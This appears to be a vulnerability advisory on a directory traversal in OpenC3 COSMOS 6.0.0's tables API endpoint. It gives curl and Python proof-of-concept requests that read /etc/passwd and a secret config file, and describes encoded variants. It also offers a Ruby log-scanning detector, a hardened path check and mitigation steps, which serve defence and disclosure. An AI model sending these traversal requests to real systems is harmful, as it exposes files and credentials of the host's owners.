The CVE-2025-XXXX vulnerability in OpenC3 COSMOS 6.0.0 is a directory traversal in the `openc3-api/tables` endpoint caused by insufficient validation of a user-supplied file path parameter. The value is passed to file operations without being canonicalized or checked against the intended base directory, so a request whose parameter contains `../` sequences can walk out of the table storage directory and read arbitrary files that the COSMOS service account can access. Exploitation requires only an HTTP request to the endpoint with a crafted path; no memory corruption or other preconditions are described.
DailyCVE Form:
Platform: OpenC3 COSMOS
Version: 6.0.0
Vulnerability: Directory Traversal
Severity: High
Date: Jun 16, 2025
Prediction: Patch expected by Jul 10, 2025
What Undercode Say:
curl -X GET 'http://target/openc3-api/tables?file=../../etc/passwd'

import requests

# Same traversal payload as the curl request above; `file` is the parameter name as given on this page.
response = requests.get('http://target/openc3-api/tables', params={'file': '../../secret.conf'})
print(response.status_code, response.text)
How Exploit:
Craft HTTP requests to the `openc3-api/tables` endpoint whose file path parameter contains `../` sequences (plain, URL-encoded as `%2e%2e%2f`, or double-encoded) to read files outside the table directory.
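For detection, the request pattern above is easy to spot in web-server access logs once the target is decoded. The Ruby below is an added example, not code from OpenC3 or this page: it scans constructed, nginx-style log lines (the sample data is made up) for the `openc3-api/tables` traversal, decoding percent-encoding repeatedly so the encoded and double-encoded variants are caught, and normalizing backslashes so a Windows-style `..\` payload is also flagged.

```ruby
require 'uri'

# Constructed sample access-log lines in the common nginx/apache request-line
# shape. These are NOT real COSMOS logs; the traffic is invented for the example.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [16/Jun/2025:10:01:02 +0000] "GET /openc3-api/tables?file=../../etc/passwd HTTP/1.1" 200 1843
  10.0.0.5 - - [16/Jun/2025:10:01:09 +0000] "GET /openc3-api/tables?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843
  10.0.0.5 - - [16/Jun/2025:10:01:15 +0000] "GET /openc3-api/tables?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
  10.0.0.7 - - [16/Jun/2025:10:02:30 +0000] "GET /openc3-api/tables?file=MyTable.bin HTTP/1.1" 200 512
  10.0.0.7 - - [16/Jun/2025:10:02:45 +0000] "GET /openc3-api/tables?file=config..old.txt HTTP/1.1" 200 77
  10.0.0.9 - - [16/Jun/2025:10:03:00 +0000] "GET /openc3-api/tables?file=..\\..\\windows\\win.ini HTTP/1.1" 200 0
LOG

# Pull the request target (path plus query) out of the quoted request line.
def extract_request_target(line)
  line[/"(?:GET|POST|PUT|PATCH|DELETE|HEAD) (\S+) HTTP\//, 1]
end

# Percent-decode until the value stops changing (bounded), so "%252e" -> "%2e" -> "."
# is seen for what it is. Malformed encodings are left as-is rather than dropped.
def fully_decode(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    break if decoded == value
    value = decoded
  end
  value
rescue ArgumentError
  value
end

# Decode and fold backslashes to forward slashes so "..\" is treated like "../".
def normalize(value)
  fully_decode(value).gsub('\\', '/')
end

# A path traverses when any segment is exactly "..". Names that merely contain
# two dots ("config..old.txt") are legitimate and must not be flagged.
def traversal?(value)
  normalize(value).split('/').include?('..')
end

# Returns [[line_number, normalized_payload], ...] for every line whose path or
# any query-string value contains a ".." segment after decoding.
def flag_traversal(log_text)
  hits = []
  log_text.each_line.with_index(1) do |line, lineno|
    target = extract_request_target(line)
    next unless target
    path, query = target.split('?', 2)
    candidates = [path]
    begin
      candidates.concat(URI.decode_www_form(query).map { |_k, v| v }) if query
    rescue ArgumentError
      candidates << query
    end
    bad = candidates.select { |c| traversal?(c) }
    hits << [lineno, normalize(bad.first)] unless bad.empty?
  end
  hits
end

if __FILE__ == $PROGRAM_NAME
  flag_traversal(SAMPLE_LOG).each { |lineno, payload| puts "line #{lineno}: #{payload}" }
end
```

Running the block lists lines 1, 2, 3 and 6 of the sample; the double-encoded request on line 3 is worth keeping as a signal even when the server returned 404, because it shows an attacker probing for a decoder mismatch. Running the same check over the decoded parameter value before it reaches the file system is also a reasonable belt-and-braces control on the application side.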
Protection from this CVE:
Update to the patched version once it is available. Until then, restrict network access to the COSMOS API to trusted hosts. The underlying fix is to treat the file parameter as a name, not a path: resolve it relative to the table directory, canonicalize the result, and reject the request unless the canonical path is still inside that directory; rejecting absolute paths and `..` segments outright is a simpler check that also works.
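The vulnerable join beside its hardened form, as an added Ruby example (COSMOS's API is Ruby, but this is not the project's code and not the actual patch). `TABLE_ROOT` is a hypothetical base directory standing in for wherever the table endpoint serves files from; the hardened version resolves the user value against that root and refuses anything that does not land inside it.

```ruby
# Hypothetical base directory for the example; not a real COSMOS path.
TABLE_ROOT = '/var/openc3/tables'

# Vulnerable pattern: the user-supplied name is glued onto the base directory
# with no check on where the result ends up, so "../../etc/passwd" walks out
# of TABLE_ROOT. This is the shape of bug the advisory describes.
def unsafe_table_path(user_file)
  File.join(TABLE_ROOT, user_file)
end

# Hardened pattern: resolve the value relative to TABLE_ROOT, then require the
# canonical result to sit inside TABLE_ROOT. Returns the resolved path or nil.
def safe_table_path(user_file)
  return nil if user_file.nil? || user_file.empty?
  # NUL bytes truncate paths in C-backed file APIs; reject them explicitly.
  return nil if user_file.include?("\0")
  # File.expand_path expands a leading "~" to $HOME, which is outside the root.
  return nil if user_file.start_with?('~')

  # expand_path collapses "." and ".." lexically without touching the disk.
  # An absolute user_file ("/etc/passwd") comes back unchanged, so the prefix
  # check below is what actually blocks it.
  resolved = File.expand_path(user_file, TABLE_ROOT)
  # The trailing "/" matters: "/var/openc3/tables2/x" starts with TABLE_ROOT
  # but is not inside it.
  inside = resolved == TABLE_ROOT || resolved.start_with?(TABLE_ROOT + '/')
  inside ? resolved : nil
rescue ArgumentError
  nil
end
```

Rails decodes percent-encoding before a parameter reaches the controller, so this check runs on the decoded string and the `%2e%2e%2f` variant is handled the same way as plain `../`. `File.expand_path` does not follow symlinks; if the table directory can contain symlinks pointing outside it, resolve with `File.realpath` after the existence check and apply the same prefix test to the result.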
Impact:
Unauthorized disclosure of any file readable by the COSMOS service process, including configuration files and stored credentials, which can be used as a stepping stone to broader compromise of the host or the ground-system environment.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode